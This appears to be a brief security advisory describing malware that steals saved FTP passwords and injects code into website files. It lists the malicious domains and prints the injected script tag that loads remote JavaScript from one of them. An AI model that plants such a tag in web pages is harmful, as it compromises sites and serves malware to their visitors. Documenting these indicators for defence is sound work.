Description: This malware infects a web site through a compromised desktop (with virus), where
it steals any stored password from the FTP client and uses that to attack the site.
Note that every PHP, HTML and JS file can get compromised by this malware.
*On some variations, we are also seeing sites get hacked through outdated web applications (Joomla and WordPress).
Domains used::
http://www.update-java.kit.net/java.js
http://coracaodedavi.com.br/plugin.js
www.update-java.net
http://wholelifewholeworld.com/jslib/le.js
Affecting: Any web site with FTP enabled (and password stolen).
Clean up:Sign up here: http://sucuri.net/signup
Malware dump:
<script src="http://wholelifewholeworld.com /jslib/le.js"></script>